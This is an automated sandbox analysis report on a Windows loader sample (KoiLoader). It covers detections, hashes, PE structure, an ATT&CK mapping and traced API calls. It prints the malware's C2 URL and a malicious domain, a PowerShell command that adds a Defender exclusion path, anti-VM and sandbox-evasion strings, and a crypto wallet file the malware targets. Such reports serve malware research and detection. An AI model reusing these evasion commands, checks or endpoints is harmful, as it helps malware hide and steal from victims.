Code function: 0_2_005E89F0 EnumDisplayDevicesW,EnumDisplayDevicesW,StrStrIW,StrStrIW,StrStrIW,StrStrIW,StrStrIW,EnumDisplayDevicesW,GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,PathCombineW,GetFileAttributesW,PathCombineW,GetFileAttributesW,StrStrIW,PathCombineW,PathCombineW,PathCombineW,GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,lstrcmpA,lstrcmpA,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,PathCombineW,GetFileAttributesW,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,lstrcmpA,GetProcessHeap,HeapFree,ExpandEnvironmentStringsW,GetFileAttributesW,GetFileAttributesExW,GetComputerNameW,GetUserNameW,GetSystemMetrics,KiUserCallbackDispatcher,GetSystemMetrics,lstrcmpW,lstrcmpW,StrStrW,lstrcmpW,lstrcmpW,lstrcmpW,GlobalMemoryStatusEx,lstrcmpW,lstrcmpW,lstrcmpW,PathCombineW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,FindNextFileW,FindClose,StrStrIW,GetModuleFileNameW,StrStrIW,

0_2_005E89F0

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	21 Native API	1 DLL Side-Loading	1 Access Token Manipulation	21 Virtualization/Sandbox Evasion	OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	2 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	11 Process Injection	1 Access Token Manipulation	LSASS Memory	231 Security Software Discovery	Remote Desktop Protocol	Data from Removable Media	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	11 Process Injection	Security Account Manager	21 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	1 Bypass User Account Control	1 Deobfuscate/Decode Files or Information	NTDS	1 Account Discovery	Distributed Component Object Model	Input Capture	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	2 Obfuscated Files or Information	LSA Secrets	1 System Owner/User Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	1 File and Directory Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Bypass User Account Control	DCSync	112 System Information Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
JT1yqn67un.exe	71%	ReversingLabs	Win32.Trojan.Koiloader
JT1yqn67un.exe	58%	Virustotal		Browse
JT1yqn67un.exe	100%	Avira	HEUR/AGEN.1317648
JT1yqn67un.exe	100%	Joe Sandbox ML

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Link
http://2.58.14.95/malto.php%temp%	0%	Virustotal	Browse
http://2.58.14.95/malto.php	0%	Virustotal	Browse
https://lacasadelverde.com/css	0%	Virustotal	Browse
https://lacasadelverde.com/css/c	0%	Virustotal	Browse

Domains and IPs

Contacted Domains

⊘No contacted domains info

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://2.58.14.95/malto.php	true	0%, Virustotal, Browse	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://lacasadelverde.com/css/c	JT1yqn67un.exe, 00000000.00000002.1735347599.0000000000B8E000.00000004.00000020.00020000.00000000.sdmp, JT1yqn67un.exe, 00000000.00000002.1735137661.00000000005E1000.00000020.00001000.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://lacasadelverde.com/css	JT1yqn67un.exe	true	0%, Virustotal, Browse	unknown
http://2.58.14.95/malto.php%temp%	JT1yqn67un.exe, 00000000.00000002.1735347599.0000000000B8E000.00000004.00000020.00020000.00000000.sdmp, JT1yqn67un.exe, 00000000.00000002.1735137661.00000000005E1000.00000020.00001000.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown

World Map of Contacted IPs

⊘No contacted IP infos

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1528834
Start date and time:	2024-10-08 10:34:22 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 1m 50s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	1
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	JT1yqn67un.exe renamed because original name is a hash value
Original Sample Name:	9e88e85a46486f7f56b3aaba6e29737c.exe
Detection:	MAL
Classification:	mal100.bank.troj.expl.evad.winEXE@1/0@0/0
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 97% Number of executed functions: 5 Number of non-executed functions: 61
Cookbook Comments:	Found application associated with file extension: .exe Stop behavior analysis, all processes terminated

Simulations

Behavior and APIs

⊘No simulations

Joe Sandbox View / Context

IPs

⊘No context

Domains

⊘No context

ASNs

⊘No context

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Created / dropped Files

⊘No created / dropped files found

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	5.892192819985257
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	JT1yqn67un.exe
File size:	194'048 bytes
MD5:	9e88e85a46486f7f56b3aaba6e29737c
SHA1:	c33d28a63c240f4677b185e7cbc918da3d4f49ec
SHA256:	deb72a5ebd26b40dc1847314d896b4e768f6f14d95fcfcbf1046c65518df5883
SHA512:	a33576d07b4aba69b4aad6e7edd797b9cb1af48ff03261d0b66a61dd1f410dd57736b7e7797d790807eca7c779d6381a680542646a46c4437d1b48ce8a0c467e
SSDEEP:	3072:QA+MPNsjU+g/Pu92PkWMW50y4jrv34ClUCe33ghzk3Jc1333333333333M/Ncw3m:XJPxktlK33ghzk3Jc1333333333333sY
TLSH:	84146A7239C9C538D0336C3686A9359D1D3CF7D98F517CFB13640B0B4AA65818BB2EA6
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......oaN`+. 3+. 3+. 3`x#2!. 3`x%2.. 3`x$2?. 3..$29. 3..#2?. 3..%2.. 3`x!2,. 3+.!3A. 3..)2. 3...3. 3+..3. 3.."2. 3Rich+. 3.......

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x4049b4
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x66CDD42B [Tue Aug 27 13:27:07 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	66deda4204cb009d8c01c3f28c17567f

Entrypoint Preview

Instruction
call 00007EFFC8C7D269h
jmp 00007EFFC8C7CCDFh
push ebp
mov ebp, esp
push 00000000h
call dword ptr [0041305Ch]
push dword ptr [ebp+08h]
call dword ptr [00413058h]
push C0000409h
call dword ptr [0041300Ch]
push eax
call dword ptr [00413014h]
pop ebp
ret
push ebp
mov ebp, esp
sub esp, 00000324h
push 00000017h
call dword ptr [00413060h]
test eax, eax
je 00007EFFC8C7CE67h
push 00000002h
pop ecx
int 29h
mov dword ptr [0041BAB8h], eax
mov dword ptr [0041BAB4h], ecx
mov dword ptr [0041BAB0h], edx
mov dword ptr [0041BAACh], ebx
mov dword ptr [0041BAA8h], esi
mov dword ptr [0041BAA4h], edi
mov word ptr [0041BAD0h], ss
mov word ptr [0041BAC4h], cs
mov word ptr [0041BAA0h], ds
mov word ptr [0041BA9Ch], es
mov word ptr [0041BA98h], fs
mov word ptr [0041BA94h], gs
pushfd
pop dword ptr [0041BAC8h]
mov eax, dword ptr [ebp+00h]
mov dword ptr [0041BABCh], eax
mov eax, dword ptr [ebp+04h]
mov dword ptr [0041BAC0h], eax
lea eax, dword ptr [ebp+08h]
mov dword ptr [0041BACCh], eax
mov eax, dword ptr [ebp-00000324h]
mov dword ptr [0041BA08h], 00010001h

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x19c90	0x3c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x1d000	0x14c20	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x32000	0x1248	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x18ac0	0x38	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x18a00	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x13000	0x120	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x110f8	0x11200	f74d11cfe8e6d8e71072a0f11d9c7e99	False	0.5522496578467153	data	6.540620762088607	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x13000	0x730c	0x7400	43bad7cdc02fea52ffa73e87a7e3367c	False	0.44396551724137934	OpenPGP Public Key	4.906263467320942	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x1b000	0x168c	0xa00	05e197c695a0d6994051ad539ab3ce55	False	0.176953125	data	2.3864029716696016	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x1d000	0x14c20	0x14e00	203e1bbc3958c8917244511c60004552	False	0.5135666167664671	data	4.900628725869767	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x32000	0x1248	0x1400	76ad3658e65dc48ccae7781fa560593e	False	0.7134765625	data	6.282640625763616	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_DIALOG	0x1d118	0x168	data	English	United States	0.6333333333333333
RT_RCDATA	0x1d280	0x1d	data	English	United States	1.3103448275862069
RT_RCDATA	0x1d2a0	0x14800	data	English	United States	0.5153272675304879
RT_MANIFEST	0x31aa0	0x17d	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.5931758530183727

Imports

DLL

Import

KERNEL32.dll

VirtualFree, GetCurrentProcess, VirtualAlloc, TerminateProcess, GetModuleHandleA, GetLastError, GetProcAddress, ExitProcess, VirtualProtect, BuildCommDCBAndTimeoutsA, WriteConsoleW, CloseHandle, CreateFileW, SetFilePointerEx, GetConsoleMode, GetConsoleOutputCP, FlushFileBuffers, HeapReAlloc, HeapSize, GetModuleHandleW, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, RtlUnwind, RaiseException, SetLastError, EncodePointer, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, LoadLibraryExW, GetStdHandle, WriteFile, GetModuleFileNameW, GetModuleHandleExW, HeapFree, HeapAlloc, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, MultiByteToWideChar, WideCharToMultiByte, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetStdHandle, GetFileType, GetStringTypeW, LCMapStringW, GetProcessHeap, DecodePointer

GDI32.dll

LPtoDP

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Target ID:	0
Start time:	04:35:19
Start date:	08/10/2024
Path:	C:\Users\user\Desktop\JT1yqn67un.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\JT1yqn67un.exe"
Imagebase:	0xf00000
File size:	194'048 bytes
MD5 hash:	9E88E85A46486F7F56B3AABA6E29737C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_KoiLoader_1, Description: Yara detected KoiLoader, Source: 00000000.00000002.1735137661.00000000005E1000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.1735137661.00000000005E1000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_KoiLoader_1, Description: Yara detected KoiLoader, Source: 00000000.00000002.1735347599.0000000000B8E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.1735347599.0000000000B8E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	8.7%
Dynamic/Decrypted Code Coverage:	18.1%
Signature Coverage:	14.7%
Total number of Nodes:	1384
Total number of Limit Nodes:	9

Executed Functions

Function 005E89F0 Relevance: 219.4, APIs: 80, Strings: 45, Instructions: 640
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

EnumDisplayDevicesW.USER32(00000000,00000000,00000000,00000000), ref: 005E8A2E
StrStrIW.KERNELBASE(?,Hyper-V), ref: 005E8A4D
StrStrIW.SHLWAPI(?,VMWare), ref: 005E8A63
StrStrIW.SHLWAPI(?,Parallels Display Adapter), ref: 005E8A79
StrStrIW.SHLWAPI(?,Red Hat QXL controller), ref: 005E8A8F
EnumDisplayDevicesW.USER32(00000000,00000001,00000348,00000000), ref: 005E8AA4
GetModuleHandleA.KERNEL32(kernel32), ref: 005E8AAF
GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 005E8AC3
GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 005E8ACE
ExpandEnvironmentStringsW.KERNEL32(%systemroot%\System32\VBoxService.exe,?,00000104), ref: 005E8AFD
ExpandEnvironmentStringsW.KERNEL32(%systemroot%\System32\VBoxTray.exe,?,00000104), ref: 005E8B10
GetFileAttributesW.KERNELBASE(?), ref: 005E8B1F
GetFileAttributesW.KERNEL32(?), ref: 005E8B31

Strings

Admin, xrefs: 005E90BB
Files.docx, xrefs: 005E8BCB
7, xrefs: 005E8E92
d5.vc/g, xrefs: 005E8FCF
Resource.txt, xrefs: 005E8C34
FORTI-PC, xrefs: 005E9017
docx, xrefs: 005E91AB
sal.rosenburg, xrefs: 005E8FA0
SFTOR-PC, xrefs: 005E901E
kernel32, xrefs: 005E8AAA
xls, xrefs: 005E91B7
Recently.docx, xrefs: 005E8BAC
doc, xrefs: 005E919C
new songs.txt, xrefs: 005E8DEE
BAIT, xrefs: 005E8D88, 005E8D9A
WDAGUtilityAccount, xrefs: 005E8F99
VMWare, xrefs: 005E8A57
Are.docx, xrefs: 005E8BC4
%appdata%\Jaxx\Local Storage\wallet.dat, xrefs: 005E8EE5
%systemroot%\System32\VBoxTray.exe, xrefs: 005E8B0B
Anna, xrefs: 005E9074
ANNA-PC, xrefs: 005E9086
` ^| ^, xrefs: 005E8BBA, 005E8BD5
7, xrefs: 005E8F23
WILLCARTER-PC, xrefs: 005E900E
Jennifer Lopez & Pitbull - On The FloorBeyonce - Halo, xrefs: 005E8E9C
DESKTOP-ET51AJO, xrefs: 005E8FFB
powershell.exe, xrefs: 005E9236
Hyper-V, xrefs: 005E8A40
PJones, xrefs: 005E8F8B
Bruno, xrefs: 005E8FE9
@, xrefs: 005E9047
Joe Cage, xrefs: 005E8F76
Paul Jones, xrefs: 005E8F84
xlsx, xrefs: 005E91C3
Parallels Display Adapter, xrefs: 005E8A6D
Opened.docx, xrefs: 005E8BB3
Wow64DisableWow64FsRedirection, xrefs: 005E8ABD
%systemroot%\System32\VBoxService.exe, xrefs: 005E8AF8
STRAZNJICA.GRUBUTT, xrefs: 005E8F7D
Wow64RevertWow64FsRedirection, xrefs: 005E8AC5
OpenVPN.txt, xrefs: 005E8C43
These.docx, xrefs: 005E8BBD
Harry Johnson, xrefs: 005E8F92
Red Hat QXL controller, xrefs: 005E8A83

Memory Dump Source

Source File: 00000000.00000002.1735137661.00000000005E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.1735113174.00000000005E0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1735167254.00000000005EB000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_JT1yqn67un.jbxd

Yara matches

Similarity

API ID: AddressAttributesDevicesDisplayEnumEnvironmentExpandFileProcStrings$HandleModule
String ID: %appdata%\Jaxx\Local Storage\wallet.dat$%systemroot%\System32\VBoxService.exe$%systemroot%\System32\VBoxTray.exe$7$7$@$ANNA-PC$Admin$Anna$Are.docx$BAIT$Bruno$DESKTOP-ET51AJO$FORTI-PC$Files.docx$Harry Johnson$Hyper-V$Jennifer Lopez & Pitbull - On The FloorBeyonce - Halo$Joe Cage$OpenVPN.txt$Opened.docx$Puser$Parallels Display Adapter$Paul user$Recently.docx$Red Hat QXL controller$Resource.txt$SFTOR-PC$STRAZNJICA.GRUBUTT$These.docx$VMWare$WDAGUtilityAccount$WILLCARTER-PC$Wow64DisableWow64FsRedirection$Wow64RevertWow64FsRedirection$` ^| ^$d5.vc/g$doc$docx$kernel32$new songs.txt$powershell.exe$sal.rosenburg$xls$xlsx
API String ID: 4266617301-1374900837
Opcode ID: 1854b5f228053f7880674e521978d663c31b010468876a506daebe7090a937b0
Instruction ID: 70fbfa9cfb1bf5f24e916b926b8ac3331e79e28cad9c1783a974814be3f58035
Opcode Fuzzy Hash: 1854b5f228053f7880674e521978d663c31b010468876a506daebe7090a937b0
Instruction Fuzzy Hash: 2A32817190029DAAEF289BA68C8CFEF7BBCBF04711F000555E598E7190EB749A49CF50

Function 00F01300 Relevance: 19.5, APIs: 9, Strings: 2, Instructions: 297
librarymemoryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32(kernel32), ref: 00F0132A
VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 00F01343
GetModuleHandleA.KERNEL32(kernel32,LoadLibraryA), ref: 00F01439
GetProcAddress.KERNEL32(00000000), ref: 00F01440
LoadLibraryA.KERNELBASE(?), ref: 00F01459

Strings

LoadLibraryA, xrefs: 00F0142F
kernel32, xrefs: 00F01325, 00F01434

Memory Dump Source

Source File: 00000000.00000002.1735690091.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1735640665.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1735736176.0000000000F13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1735775977.0000000000F1B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1735818157.0000000000F1D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_JT1yqn67un.jbxd

Similarity

API ID: HandleModule$AddressAllocLibraryLoadProcVirtual
String ID: LoadLibraryA$kernel32
API String ID: 3393750808-970291620
Opcode ID: cc2036450d0d5350381c60572e568b0521c2fbf5e3e0af88fab6c747bce8151e
Instruction ID: 8acf004c47e9b113821c71c42e4783ad6b73af3793d277568167c4bd2a77d245
Opcode Fuzzy Hash: cc2036450d0d5350381c60572e568b0521c2fbf5e3e0af88fab6c747bce8151e
Instruction Fuzzy Hash: AED1E575E00219DFCB18CF98D894AFEB7B6FF88304F248159E406AB395D735A981EB50

Function 005E9250 Relevance: 3.0, APIs: 2, Instructions: 49
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetUserDefaultLangID.KERNEL32 ref: 005E9256
ExitProcess.KERNEL32 ref: 005E92FE

Part of subcall function 005E89F0: EnumDisplayDevicesW.USER32(00000000,00000000,00000000,00000000), ref: 005E8A2E
Part of subcall function 005E89F0: StrStrIW.KERNELBASE(?,Hyper-V), ref: 005E8A4D
Part of subcall function 005E89F0: StrStrIW.SHLWAPI(?,VMWare), ref: 005E8A63
Part of subcall function 005E89F0: StrStrIW.SHLWAPI(?,Parallels Display Adapter), ref: 005E8A79
Part of subcall function 005E89F0: StrStrIW.SHLWAPI(?,Red Hat QXL controller), ref: 005E8A8F
Part of subcall function 005E89F0: EnumDisplayDevicesW.USER32(00000000,00000001,00000348,00000000), ref: 005E8AA4
Part of subcall function 005E89F0: GetModuleHandleA.KERNEL32(kernel32), ref: 005E8AAF
Part of subcall function 005E89F0: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 005E8AC3
Part of subcall function 005E89F0: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 005E8ACE
Part of subcall function 005E89F0: ExpandEnvironmentStringsW.KERNEL32(%systemroot%\System32\VBoxService.exe,?,00000104), ref: 005E8AFD
Part of subcall function 005E89F0: ExpandEnvironmentStringsW.KERNEL32(%systemroot%\System32\VBoxTray.exe,?,00000104), ref: 005E8B10
Part of subcall function 005E89F0: GetFileAttributesW.KERNELBASE(?), ref: 005E8B1F
Part of subcall function 005E89F0: GetFileAttributesW.KERNEL32(?), ref: 005E8B31

Part of subcall function 005E8710: InitializeCriticalSection.KERNEL32(005EA088), ref: 005E8732
Part of subcall function 005E8710: GetVolumeInformationW.KERNEL32(C:\,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 005E875F
Part of subcall function 005E8710: StringFromGUID2.OLE32(?,?,00000080), ref: 005E87B8
Part of subcall function 005E8710: wsprintfA.USER32 ref: 005E87CF
Part of subcall function 005E8710: CreateMutexW.KERNEL32(00000000,00000001,?), ref: 005E87E3
Part of subcall function 005E8710: GetLastError.KERNEL32 ref: 005E87EE
Part of subcall function 005E8710: WSAStartup.WS2_32(00000202,?), ref: 005E882C
Part of subcall function 005E8710: CryptAcquireContextA.ADVAPI32(005EA4F4,00000000,Microsoft Enhanced RSA and AES Cryptographic Provider,00000018,F0000000), ref: 005E8845
Part of subcall function 005E8710: CryptAcquireContextA.ADVAPI32(005EA4F4,00000000,Microsoft Enhanced RSA and AES Cryptographic Provider,00000018,F0000008), ref: 005E8861

Part of subcall function 005E72E0: ExpandEnvironmentStringsW.KERNEL32(%ComSpec%,?,00000104,?,?,?,005E92E8), ref: 005E7306
Part of subcall function 005E72E0: ExpandEnvironmentStringsW.KERNEL32(%ProgramW6432%,?,00000104,?,?,?,005E92E8), ref: 005E7319
Part of subcall function 005E72E0: lstrlenW.KERNEL32(?,?,?,?,005E92E8), ref: 005E7322
Part of subcall function 005E72E0: ExpandEnvironmentStringsW.KERNEL32(%ProgramFiles%,?,00000104,?,?,?,005E92E8), ref: 005E733D
Part of subcall function 005E72E0: GetSystemWow64DirectoryW.KERNEL32(?,00000104,?,?,?,005E92E8), ref: 005E734B
Part of subcall function 005E72E0: GetLastError.KERNEL32(?,?,?,005E92E8), ref: 005E7355
Part of subcall function 005E72E0: wnsprintfW.SHLWAPI ref: 005E7377
Part of subcall function 005E72E0: ExpandEnvironmentStringsW.KERNEL32(?,?,00000104), ref: 005E738F
Part of subcall function 005E72E0: wnsprintfW.SHLWAPI ref: 005E73A9
Part of subcall function 005E72E0: SetFileAttributesW.KERNEL32(?,00000006), ref: 005E73C5
Part of subcall function 005E72E0: lstrcpyW.KERNEL32(?,/c "powershell -command Add-MpPreference -ExclusionPath 'C:\ProgramData'"), ref: 005E73D7
Part of subcall function 005E72E0: GetUserNameW.ADVAPI32(?,?), ref: 005E73F6
Part of subcall function 005E72E0: NetUserGetInfo.NETAPI32(00000000,?,00000001,00000000), ref: 005E740B
Part of subcall function 005E72E0: NetApiBufferFree.NETAPI32(00000000), ref: 005E7420
Part of subcall function 005E72E0: CoInitializeEx.OLE32(00000000,?), ref: 005E7437
Part of subcall function 005E72E0: lstrlenW.KERNEL32({3E5FC7F9-9A51-4367-9063-A120244FBEC7}), ref: 005E7451

Part of subcall function 005E93B0: CryptGenRandom.ADVAPI32(00000020,?), ref: 005E93C8
Part of subcall function 005E93B0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 005E9425
Part of subcall function 005E93B0: HeapFree.KERNEL32(00000000), ref: 005E942C
Part of subcall function 005E93B0: wsprintfA.USER32 ref: 005E945F
Part of subcall function 005E93B0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 005E9498
Part of subcall function 005E93B0: HeapFree.KERNEL32(00000000), ref: 005E949B
Part of subcall function 005E93B0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 005E94A0
Part of subcall function 005E93B0: HeapFree.KERNEL32(00000000), ref: 005E94A3

Part of subcall function 005E7920: LsaOpenPolicy.ADVAPI32(00000000,005EA060,00000001,?), ref: 005E795C
Part of subcall function 005E7920: LsaQueryInformationPolicy.ADVAPI32(?,0000000C,?), ref: 005E7975
Part of subcall function 005E7920: GetProcessHeap.KERNEL32(00000008,?), ref: 005E7991
Part of subcall function 005E7920: HeapAlloc.KERNEL32(00000000), ref: 005E7994
Part of subcall function 005E7920: LsaFreeMemory.ADVAPI32(?), ref: 005E79DB
Part of subcall function 005E7920: LsaClose.ADVAPI32(?), ref: 005E79E4
Part of subcall function 005E7920: GetComputerNameW.KERNEL32(?,?), ref: 005E7A00
Part of subcall function 005E7920: GetUserNameW.ADVAPI32(?,00000101), ref: 005E7A11
Part of subcall function 005E7920: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 005E7A32

Part of subcall function 005E8900: ExpandEnvironmentStringsW.KERNEL32(%SYSTEMROOT%\Microsoft.NET\Framework\v4.0.30319\csc.exe,?,00000104), ref: 005E8921
Part of subcall function 005E8900: ExpandEnvironmentStringsW.KERNEL32(%SYSTEMROOT%\Microsoft.NET\Framework\v2.0.50727\csc.exe,?,00000104), ref: 005E8934
Part of subcall function 005E8900: ExpandEnvironmentStringsW.KERNEL32(%ComSpec%,?,00000104), ref: 005E8947
Part of subcall function 005E8900: GetFileAttributesW.KERNEL32(?), ref: 005E896D
Part of subcall function 005E8900: lstrcpyW.KERNEL32(00000000,sd4.ps1), ref: 005E899D
Part of subcall function 005E8900: wnsprintfW.SHLWAPI ref: 005E89C0
Part of subcall function 005E8900: ShellExecuteW.SHELL32(00000000,open,?,?,00000000,00000000), ref: 005E89E2

Memory Dump Source

